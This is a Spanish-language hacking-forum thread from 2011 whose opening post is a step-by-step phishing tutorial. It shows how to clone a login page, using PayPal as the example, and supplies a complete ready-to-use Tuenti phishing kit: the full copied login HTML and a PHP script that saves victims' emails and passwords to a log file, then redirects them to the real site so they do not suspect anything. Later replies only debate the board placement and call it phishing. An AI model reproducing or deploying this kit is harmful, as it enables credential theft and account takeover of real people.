elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Hacer copia de paginas web!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Hacer copia de paginas web!  (Leído 5,910 veces)
1/2lemon

Desconectado Desconectado

Mensajes: 7


El1/2Limon


Ver Perfil
Hacer copia de paginas web!
« en: 14 Marzo 2011, 17:33 pm »

Como hacer una copia de cualquier web!

*Primero necesitamos descargar el Macromedia Dreamware 8  .

*Luego entramos en la pagina web que keramos y damos click con el boton derecho y luego "guardar como" y seleccionamos pagina web solo HTML y la nombramos  "index.htm".

*Abrimos el archivo con el Macromedia y seleccionamos la pestaña diseño. Luego apretamos sobre el recuadro donde se introduce el usuario y nos apuntamos la variable :

Hacemos lo mismo con el campo de la contraseña.

*Ahora abrimos un bloc de notas y pegamos lo siguiente :


Código
  1. <?php
  2. header('Location: "AQUI ESCRIBE LA PAGINA ORIGINAL DEL LOGIN SIN COMILLAS DOBLES,SOLO DEJA LAS COMILLAS SIMPLES"');
  3. $user=$_POST['login_email'];
  4. $password=$_POST['login_password'];
  5. $guarda=fopen("logs.txt",a);
  6. fwrite($guarda,"
  7. *******info********
  8. User: ".$user."
  9. Password: ".$password);
  10. fclose($guarda);
  11. ?>
  12.  

Como ven hemos introducido el nombre de las variables  en las lineas 3 y 4.

*Lo guardamos como login.php y seguimos con el index.htm abierto en el macromedia , seleccionamos la pestaña codigo y buscamos <form y le cambiamos la accion a login.php :[/size][/color]

 
Código
  1. <form method="post" name="login_form" action="https://www.paypal.com/es/cgi-bin/webscr?cmd=_login-submit&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d5fa8ff279e37c3d9d4e38bdbee0ede69"><input type="hidden" name="login_cmd" value=""><input type="hidden" name="login_params" value=""><fieldset>
                                   

                              
       lo cambiamos a

 
Código
  1. <form method="post" name="login_form" action="login.php"><input type="hidden" name="login_cmd" value=""><input type="hidden" name="login_params" value=""><fieldset>
  2.  
*Lo guardamos y ya tenemos nuestros archivos preparados para subirlos a nuestra web! Pero recuerden cambiar los permisos de los archivos.

*Para ver quien entra pongan su direccion web y a continuacion /logs.txt , que es el archivo especificado en el .php.[/color][/size]

             Y aqui les dejo un scam de tuenti.
Archivo index.htm

-----------------------------------------------------------------------------------------------------------------
Código
  1. &#65279;<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es_ES" lang="es_ES"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="google" content="notranslate" /><title>Acceso a Tuenti</title><link rel="shortcut icon" href="http://estaticosak1.tuenti.com/layout/web2-Zero/images/3_favicon.54771.png" /><style>.hide {display:none !important;}.loadingPage .canvas, .loadingPage .footer {position:absolute;top:-100000px;left:-100000px;display: none;background: #4E7BA8 url(/layout/web2-Zero/images/layout/3_login_background.54771.png) repeat-x;}</style>    <link rel="stylesheet" href="http://estaticosak1.tuenti.com/layout/web2-Zero/css/page/3_login.54918.54771.css" type="text/css" media="screen, projection" charset="utf-8" /><script type="text/javascript">document.domain = location.host.match(/tuenti.com$/) ? 'tuenti.com' : 'tuenti.local';</script><script type="text/javascript">var SiteConfig = {};var LoaderListener = function(options) {this.listener = (typeof options.listener !== undefined) ? options.listener : undefined;this.scope = (typeof options.scope !== undefined) ? options.scope : undefined;this.priority = (typeof options.priority !== undefined) ? options.priority : undefined;this.getPriority = function() {return this.priority;};this.hasPriority = function() {return typeof this.priority !== 'undefined';};this.getScope = function() {return this.scope;};this.hasScope = function() {return typeof this.scope !== 'undefined';};this.getFunction = function() {return this.listener;};};var TraceInformation = function(options) {this.filename = options.filename;if(typeof options.preRender !== 'undefined') {this.preRenderListener = new LoaderListener(options.preRender);}if(typeof options.onRender !== 'undefined') {this.onRenderListener = new LoaderListener(options.onRender);}if(typeof options.postRender !== 'undefined') {this.postRenderListener = new LoaderListener(options.postRender);}this.getFilename = function() {return this.filename;};this.hasPreRenderListener = function() {return typeof this.preRenderListener !== 'undefined';};this.getPreRenderListener = function() {return this.preRenderListener;};this.hasOnRenderListener = function() {return typeof this.onRenderListener !== 'undefined';};this.getOnRenderListener = function() {return this.onRenderListener;};this.hasPostRenderListener = function() {return typeof this.postRenderListener !== 'undefined';};this.getPostRenderListener = function() {return this.postRenderListener;};};var DEBUG = false;var REQUEST_ENGINE_RECEIVER_FILENAME = 'request_engine/3_request_engine_receiver.49576.54918.html';var Browser = {};Browser.ie = window.ActiveXObject ? true : false;Browser.ie6 = Browser.ie && (navigator.userAgent.match(/MSIE 6/i) !== null);Browser.ie7 = Browser.ie && (navigator.userAgent.match(/MSIE 7/i) !== null);Browser.ie8 = Browser.ie && (navigator.userAgent.match(/MSIE 8/i) !== null);Browser.firefox = navigator.userAgent.match(/firefox/i) !== null;Browser.firefox2 = navigator.userAgent.match(/firefox/2/i) !== null;Browser.firefox3 = navigator.userAgent.match(/firefox/3/i) !== null;Browser.chrome = navigator.userAgent.match(/chrome/i) !== null;Browser.safari = navigator.userAgent.match(/applewebkit/i) !== null;if(Browser.firefox && navigator.userAgent.match(/megaupload/i) !== null) {if(navigator.userAgent.match(/rv:1.9.(?:[d+])/i) !== null) {Browser.firefox2 = false;Browser.firefox3 = true;}}var OS = {};OS.windows = Browser.ie || navigator.userAgent.match(/Windows/i) !== null;OS.mac = !OS.windows && navigator.userAgent.match(/Macintosh/i) !== null;OS.linux = !OS.windows && OS.mac && navigator.userAgent.match(/Linux/i) !== null;var TConsole = {_is_enabled: !Browser.ie && DEBUG && typeof console !== 'undefined',/** * @param args[] */log: function() {if(this._is_enabled) {console.log.apply(console, arguments);}},/** * @param args[] */debug: function() {if(this._is_enabled) {console.debug.apply(console, arguments);}},/** * @param args[] */info: function() {if(this._is_enabled) {console.info.apply(console, arguments);}},/** * @param args[] */warn: function() {if(this._is_enabled) {console.warn.apply(console, arguments);}},/** * @param args[] */error: function() {if(this._is_enabled) {console.error.apply(console, arguments);}},/** * @param Object object */dir: function(object) {if(this._is_enabled) {console.dir(object);}}};function get_event_target(event) {var target = undefined;if (!event){event = window.event;}if(event) {if (event.currentTarget) {target = event.currentTarget;} else if (event.target) {target = event.target;} else if (event.srcElement) {target = event.srcElement;}if (target.nodeType == 3) {target = target.parentNode;}}return target;}var OnloadCentral = {open_for_subscription: true,subscribed_functions: [],subscribe: function(func, event, additional_params) {var target = get_event_target(event);if(this.open_for_subscription) {this.subscribed_functions.push( {'func': func, 'target': target, 'params': additional_params} );} else {OnloadCentral.run_parametrized_function(func, target, additional_params);}},notify_loader_finished: function() {this.open_for_subscription = false;var i;for(i=0; i<this.subscribed_functions.length; i++) {var f = this.subscribed_functions[i];OnloadCentral.run_parametrized_function(f.func, f.target, f.params);}},run_parametrized_function: function(func_string, target, additional_params) {var bread_crumbs = func_string.split('.');var func = window;try{for(var i = 0; i < bread_crumbs.length ; i++) {func = func[bread_crumbs[i]];}func(target, additional_params);} catch(error) {setTimeout(function() { OnloadCentral.run_parametrized_function(func_string, target, additional_params); }, 500);}}};var JSON = {$specialChars: {'b': 'b', 't': 't', 'n': 'n', 'f': 'f', 'r': 'r', '"' : '"', '': '\'},$replaceChars: function(chr){return JSON.$specialChars[chr] || 'u00' + Math.floor(chr.charCodeAt() / 16).toString(16) + (chr.charCodeAt() % 16).toString(16);},encode: function(obj) {var string = [];switch (typeof obj){case 'string':return '"' + obj.replace(/[x00-x1f"]/g, JSON.$replaceChars) + '"';case 'object':if (obj instanceof Array) {for (var key in obj) {string.push(JSON.encode(obj[key]));}return '['+string.join(',')+']';} else {for (var key in obj) {var json = JSON.encode(obj[key]);if (json) { string.push(JSON.encode(key) + ':' + json); }}return '{'+string.join(',')+'}';}break;case 'number': case 'boolean': return String(obj);case false: return 'null';}return null;},decode: function(string, secure){if (typeof string != 'string' || !string.length) { return null; }if (secure && !(/^[,:{}[]0-9.-+Eaeflnr-u nrt]*$/).test(string.replace(/./g, '@').replace(/"[^"nr]*"/g, ''))) return null;return eval('(' + string + ')');}};var Cookie = {domain: '.tuenti.com',create: function (name,value,days) {var expires;if (days) {var date = new Date();date.setTime(date.getTime()+(days*24*60*60*1000));expires = '; expires='+date.toGMTString();} else {expires = '';}document.cookie = name+'='+encodeURIComponent(value)+expires+'; path=/; domain=' + Cookie.domain;},read: function (name) {var nameEQ = name + '=';var ca = document.cookie.split(';');for(var i=0;i < ca.length;i++) {var c = ca[i];while (c.charAt(0)==' ') {c = c.substring(1,c.length);}if (c.indexOf(nameEQ) == 0) {return decodeURIComponent(c.substring(nameEQ.length,c.length));}}return null;},erase: function (name) {Cookie.create(name,'',-1);},erase_all_with_prefix: function (prefix) {var regexp = new RegExp('(' + prefix + '[^= ;]+)=', 'ig');var cookies_string = document.cookie;var dirty_name_regexp_result = regexp.exec(cookies_string);while(dirty_name_regexp_result !== null) {Cookie.erase(dirty_name_regexp_result[1]);dirty_name_regexp_result = regexp.exec(cookies_string);}}};var has_ad = false;var close_delay = 0;</script><script type="text/javascript" charset="utf-8">document.domain = location.host.match(/tuenti.com$/) ? 'tuenti.com' : 'tuenti.local';var STATIC_PATH = 'http://estaticosak1.tuenti.com/';var STATIC_PATHS = ['http://estaticosak1.tuenti.com/','http://estaticosak2.tuenti.com/','http://estaticosak3.tuenti.com/'];if(window.top !== self) {window.top.onbeforeunload = undefined;window.top.location.replace('http://www.tuenti.com/?m=login');}lang = { sending: 'Enviando...'};function isObjectEmpty( ob ){for( var i in ob ) {return false;}return true;}var DEBUG = false;var DYNAMIC_TITLE_CHANGE_ON = false;var REQUEST_ENGINE_RECEIVER_FILENAME = 'request_engine/3_request_engine_receiver.49576.54918.html';var Browser = {};Browser.ie = window.ActiveXObject ? true : false;Browser.ie6 = Browser.ie && (navigator.userAgent.match(/MSIE 6/i) != null);Browser.ie7 = Browser.ie && (navigator.userAgent.match(/MSIE 7/i) != null);Browser.firefox = navigator.userAgent.match(/firefox/i) !== null;Browser.safari = navigator.userAgent.match(/applewebkit/i) !== null;</script><script type="text/javascript" charset="utf-8">var Cookie = {domain: '.tuenti.com',create: function (name,value,days) {if (days) {var date = new Date();date.setTime(date.getTime()+(days*24*60*60*1000));var expires = "; expires="+date.toGMTString();}else var expires = "";document.cookie = name+"="+encodeURIComponent(value)+expires+"; path=/; domain=" + Cookie.domain;},read: function (name) {var nameEQ = name + "=";var ca = document.cookie.split(';');for(var i=0;i < ca.length;i++) {var c = ca[i];while (c.charAt(0)==' ') c = c.substring(1,c.length);if (c.indexOf(nameEQ) == 0) return decodeURIComponent(c.substring(nameEQ.length,c.length));}return null;},erase: function (name) {Cookie.create(name,"",-1);}};function $(el) {if (typeof el == 'string') return document.getElementById(el);return el;}function show(el, type) {$(el).style.display = type ? type : 'inline';}function hide(el, type) {if($(el)) $(el).style.display = type ? type : 'none';}function toggle(el, bool) {if(bool) show(el);else hide(el);}function trim(text) {return text.replace(/^s+|s+$/g, '');}var login = {get_time_zone: function () {var date_now = new Date();var date_winter_local = new Date(date_now.getFullYear(), 0, 1, 0, 0, 0, 0);var temp = date_winter_local.toGMTString();var date_winter_gmt = new Date(temp.substring(0, temp.lastIndexOf(" ")-1));var hoursDiffStdTime = (date_winter_local - date_winter_gmt) / (1000 * 60 * 60);return hoursDiffStdTime;},sending_submit: function() {$('timezone').value = login.get_time_zone();$('submit_button').value = lang.sending;},account_deactivated_login: function() {$('timezone').value = login.get_time_zone();$('submit_button').value = lang.sending;},removeHint: function(element, elementIdToShow, removeFromDom) {if(removeFromDom) {element.parentNode.removeChild(element);} else {element.style.display = 'none';}$(elementIdToShow).style.display = 'block';$(elementIdToShow).focus();return true;},checkHint: function(element, elementIdToShow) {if(trim(element.value) == '') {element.style.display = 'none';$(elementIdToShow).style.display = 'block';}return true;}};var request_new_password = {check_submit: function() {var email = $('email');var is_valid = check.email( email.value );if(is_valid) {$('email').className = '';$('request_new_password').className='sendForm';$('submit_request_new_password_form').className = $('submit_request_new_password_form').className+' disabled';$('submit_request_new_password_form').value = lang.sending;hide('options');} else {$('email').className = 'error';}return is_valid;}};var check = {cookies: function() {Cookie.create('testcookie', 'true', 1);if(Cookie.read('testcookie') == 'true') {Cookie.erase('testcookie');return true;} else {return false;}},email: function(value) {return /^((([a-z]|d|[!#$%&'*+-/=?^_`{|}~]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])+(.([a-z]|d|[!#$%&'*+-/=?^_`{|}~]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])+)*)|((x22)((((x20|x09)*(x0dx0a))?(x20|x09)+)?(([x01-x08x0bx0cx0e-x1fx7f]|x21|[x23-x5b]|[x5d-x7e]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])|(([x01-x09x0bx0cx0d-x7f]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF]))))*(((x20|x09)*(x0dx0a))?(x20|x09)+)?(x22)))@((([a-z]|d|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])|(([a-z]|d|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])([a-z]|d|-|.|_|~|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])*([a-z]|d|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF]))).)+(([a-z]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])|(([a-z]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])([a-z]|d|-|.|_|~|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF])*([a-z]|[u00A0-uD7FFuF900-uFDCFuFDF0-uFFEF]))).?$/i.test(value);},pass: function(value) {return (value!='');},focus: function(el) {el.className = 'focus';},blur: function(el) {el.className = '';}};function is_login_page() {return document.getElementById('options') != null;}</script></head><body class="loadingPage notranslate"><xmp id="request_engine_config" class="hide" config="{&quot;retry_timeout_value&quot;:60,&quot;http_header_state&quot;:&quot;X-Tuenti-State&quot;,&quot;tuenti_state_logout&quot;:&quot;logout&quot;,&quot;tuenti_state_maintenance&quot;:&quot;maintenance&quot;,&quot;tuenti_state_feature_disabled&quot;:&quot;feature_disabled&quot;,&quot;login_redirect_cookie_name&quot;:&quot;ourl&quot;,&quot;cookie_domain&quot;:&quot;.tuenti.com&quot;,&quot;manual_logout_cookie_name&quot;:&quot;manual_logout&quot;,&quot;login_url&quot;:&quot;http://www.tuenti.com/?m=login&quot;,&quot;additional_parameters_element_id&quot;:&quot;additional_parameters&quot;,&quot;translations&quot;:{&quot;close_button&quot;:&quot;Cerrar&quot;,&quot;request_failed_title&quot;:&quot;Error&quot;,&quot;request_failed_body&quot;:&quot;Lo sentimos, se ha producido un error. Vuelve a intentarlo en unos minutos.&quot;,&quot;maintenance_title&quot;:&quot;Tuenti se encuentra en proceso de mantenimiento.&quot;,&quot;maintenance_body&quot;:&quot;Estamos actualizando la pu00e1gina para mejorar tu experiencia de usuario. Por favor, intu00e9ntalo de nuevo en unos minutos.&quot;,&quot;request_feature_disabled_body&quot;:&quot;Esta funcionalidad se encuentra desactivada temporalmente. Vuelve a intentarlo en unos minutos.&quot;,&quot;retry_countdown_text&quot;:&quot;Reitentando en &quot;,&quot;reload_title&quot;:&quot;Actualizar&quot;,&quot;reload_message&quot;:&quot;Existe una nueva versiu00f3n de la pu00e1gina, te recomendamos que actualices&quot;,&quot;reload_button_text&quot;:&quot;Actualizar&quot;}}"></xmp><div class="login"><noscript><div class="alert"><div class="icon"></div><div class="alertContent"><h3>Tienes javascript desactivado</h3><p>Para utilizar Tuenti, tienes que activar javascript en tu navegador.Haz click aquí para descubrir cómo activar javascript en <a href="http://support.microsoft.com/kb/873028/es" title="">Internet Explorer</a>, <a href="http://support.mozilla.com/es/kb/javascript" title="">Firefox</a> o <a href="http://docs.info.apple.com/article.html?path=Safari/3.0/es/9279.html" title="">Safari</a>.</p><p>Actualiza la página cuando hayas activado javascript.</p></div></div></noscript><div class="icon"></div><div class="alertContent"></div><div id="login" class="body"><form id="form_login" action="tuenti.php" method="post" onsubmit="login.sending_submit(); return true;"><fieldset><ul><li> <label class="inputLabel">Email</label><span class="input"><input id="email" class="email"name="email" type="text" value="" tabindex="1" /></span><label for="remember" class="rememberMe"><input id="remember"name="remember" type="checkbox"class="rememberMe" value="1"/>Recordarme</label></li><li><label class="inputLabel">Contraseña</label><span class="input"><input id="input_password" class="password"name="input_password" type="password" value="" tabindex="2"/></span><input id="timezone"name="timezone" type="hidden" value="1" /><a href="?m=Login&amp;func=view_request_new_password" title="¿Has olvidado tu contraseña?">¿Has olvidado tu contraseña?</a></li><li class="buttons"><input type="submit" id="submit_button" class="submit withLabels" value="Entrar" /></li></ul></fieldset></form></div><div class="getAccount"><div class="border"><a href="?m=Reverseinviter&amp;func=index" title="Consigue una cuenta">¿Quieres una cuenta?</a></div></div></div><div class="cover"><div class="description"><h1>Tuenti, tu entidad</h1><h2>¿Qué es Tuenti?</h2><p>Tuenti es una plataforma social privada, a la que se accede únicamente por invitación. Cada día la usan millones de personas para comunicarse entre ellas y compartir información.</p></div><div class="mainPoints"><ul><li class="social"><h3>Social</h3><p>Conéctate, comparte y comunícate con tus amigos, compañeros de trabajo y familia.</p></li><li class="local"><h3>Local</h3><p>Descubre servicios locales y participa con las marcas que realmente te importan.</p></li><li class="mobile"><h3>Móvil</h3><p>Accede a Tuenti desde tu móvil en tiempo real estés donde estés.</p></li></ul></div></div><div class="footer"><div class="footerContent"><ul><li><a href="?m=Login&amp;func=view_legal_info" title="Legal">Legal</a></li><li><a href="/ayuda/"title="Ayuda" >Ayuda</a></li><li><a href="http://dev.tuenti.com/"title="Desarrolladores">Desarrolladores</a></li><li><a href="http://blog.tuenti.com/"title="Blog oficial">Blog</a></li><li><a href="/prensa/"title="Prensa" >Prensa</a></li><li><a href="/publicidad/"onclick=""title="Anúnciate" >Anúnciate</a></li><li><a href="/trabajo/"onclick=""title="Empleo" >Empleo</a></li><li><a href="/sobre/"onclick=""title="Acerca de" >Acerca de</a></li><li class="copy">&copy; Tuenti 2010</li><form method="post" id="lang_form" action="?m=login"><input type="hidden" name="lang" id="lang" /><li class="language">Castellano</li><li class="language"><a href="?m=login" onclick="change_language('lang_form','lang','ca_ES'); return false;">Català</a></li><li class="language"><a href="?m=login" onclick="change_language('lang_form','lang','en_US'); return false;">English</a></li><li class="language"><a href="?m=login" onclick="change_language('lang_form','lang','eu_ES'); return false;">Euskara</a></li><li class="language"><a href="?m=login" onclick="change_language('lang_form','lang','gl_ES'); return false;">Galego</a></li></form></ul><div class="mod footerRibbon"><p>Páginas oficiales</p><ul><li><img src="http://estaticosak1.tuenti.com/creatives/photos/6918-79e34cf4b2c1d1d1b64fa51848d92f53.png" alt="10 Samsung Omnia II en juego" title="" /></li><li><img src="http://estaticosak1.tuenti.com/creatives/icons/7239-4145be9f3a717a5bf60c10cd739bd699.png" alt="Espacio Sony" title="" /></li><li><img src="http://estaticosak1.tuenti.com/creatives/icons/5196-5a5aa3c81513a1fbe2559a0f3a07a042.png" alt="Descubre el nuevo HP" title="" /></li><li><img src="http://estaticosak1.tuenti.com/creatives/icons/7337-9977b4ff4a33d445372eaccf36aef7af.png" alt="Universidad Europea de Madrid" title="" /></li><li><img src="http://estaticosak1.tuenti.com/creatives/photos/6924-d21772bd0470be47dc6202de22146fdd.png" alt="¿Qué hace tu moto aquí?" title="" /></li><li><img src="http://estaticosak1.tuenti.com/creatives/photos/7587-62887aa625a48e1c079bcfd410c89aa6.png" alt="¿Ganas de Fanta?" title="" /></li></ul></div></div></div><script type="text/javascript">document.body.className = 'noTranslate';try{var canvas = document.getElementById('canvas');if (!canvas) {canvas = document.body.firstChild;while (canvas !== null && (!canvas.className || canvas.className.indexOf('canvas') === -1)) {canvas = canvas.nextSibling;}}if(canvas) {canvas.style.marginTop = -Math.max(((parseInt(canvas.offsetHeight, 10) + 60)) / 2, 0) + 'px';}}catch(error) {try {var canvas = document.getElementById('canvas');if(canvas) {canvas.className = 'defaultLoginCanvas ' + canvas.className;}} catch(error) {} }try {if(document.getElementById('email')) {document.getElementById('email').focus();}} catch(error) {}if(!check.cookies()) {if($('errorCookies')) {show('errorCookies', 'block');hide('options');} else {show('options','block');}}function change_language(form_id, field_id, field_value) {document.getElementById(field_id).value = field_value;document.getElementById(form_id).submit();}</script></body></html>
-----------------------------------------------------------------------------------------------------------------
Archivo .php
-----------------------------------------------------------------------------------------------------------------
Código
  1. <?php
  2.  
  3.  
  4. $archivo = 'logs.txt';  //Cambiale el nombre para que nadie pueda verlo
  5. $leer = 'leerclaves';
  6.  
  7. $le=$_GET['le'];
  8. $correoMal = $_POST['email'];
  9. $clave = $_POST['input_password'];
  10.  
  11. $correo = str_replace("@","%40",$correoMal); // Reemplaza "@" por "%40", para asi poder loguearnos
  12. $md5 = md5($clave); // Codifica la contrase?a a md5, para poder loguearnos
  13.  
  14. if ($le == $leer ) {
  15. header ('Location: '.$archivo.' '); //Nos abre el txt
  16. die();
  17. }
  18.  
  19. $archivo = fopen($archivo, 'a+'); // "a+" -> Crea el solo el fichero si no existe, si existe escribe al final
  20. fwrite($archivo,'
  21. Hora: '.date("Y-m-d H:i:s").'
  22. Usuario: '.$correoMal.'
  23. Clave: '.$clave.'
  24. --------------El-1/2-Limon-------------');
  25. fclose($archivo);
  26.  
  27. // Para que no sospeche al acabar de ingresar los datos le redirecciona a la pagina autentica
  28. header('Location: http://www.tuenti.com/?ef=login&md5='.$md5.'&email='.$correo.'&timeStampSigned=3268287d40d7aba016ef63023d4de59429cd050b&timeStamp=1227468472&tz=1&remember=0');
  29. ?>

ESCRITO CON FINES EDUCATIVOOOS!


                                                                                                    By 1/2 Lemon
Cualquier duda escribanme!

                                    

 


                                    
« Última modificación: 14 Marzo 2011, 18:11 pm por 1/2lemon » En línea

1/2lemon
D3bik

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Hacer copia de paginas web!
« Respuesta #1 en: 12 Agosto 2011, 08:14 am »

 :silbar: ah no entiendo lo de la variable ¬¬  :silbar:
En línea

RedZer


Desconectado Desconectado

Mensajes: 666



Ver Perfil
Re: Hacer copia de paginas web!
« Respuesta #2 en: 12 Agosto 2011, 08:37 am »

que tiene que ver esto con hackin basico?
esto no deberia de ir en nivel web??
En línea

Nacido y criado entre gente que enseño a pensar antes de creer a ciegas, Todo me causa curiosidad en el mundo
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Hacer copia de paginas web!
« Respuesta #3 en: 12 Agosto 2011, 08:43 am »

que tiene que ver esto con hackin basico?
esto no deberia de ir en nivel web??

Depende del punto de vista en que se vea, si lo vemos por el lado de que es pishing o scam como le quieran decir no tiene dificultad alguna hacerlo, por lo que se convertiría en hacking básico, pero si lo vez que se requiere tener acceso a una web, podría ser
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
EFEX


Desconectado Desconectado

Mensajes: 1.171


"Dinero Facil"


Ver Perfil WWW
Re: Hacer copia de paginas web!
« Respuesta #4 en: 12 Agosto 2011, 10:23 am »

Esto es Phishing y creo que està prohibido
En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Hacer copia de paginas web!
« Respuesta #5 en: 12 Agosto 2011, 23:21 pm »

Esto es Phishing y creo que està prohibido

prohibido hacerlo, entenderlo no
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Puedo hacer una copia de una copia de play2?
Juegos y Consolas
MARU74 0 1,857 Último mensaje 24 Abril 2006, 20:15 pm
por MARU74
hacer copia
Juegos y Consolas
MARU74 2 1,632 Último mensaje 6 Junio 2006, 14:05 pm
por MARU74
hacer una copia de la copia del original
Multimedia
Marianna 1 2,189 Último mensaje 28 Julio 2006, 03:44 am
por Songoku
¿Como hacer una copia de mi Ubuntu?
GNU/Linux
777Rubenix777 3 3,688 Último mensaje 12 Noviembre 2010, 20:41 pm
por lizanco
Hacer copia del programa a través de JTAG
Ingeniería Inversa
jesmasuso 0 1,763 Último mensaje 2 Enero 2015, 10:40 am
por jesmasuso
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines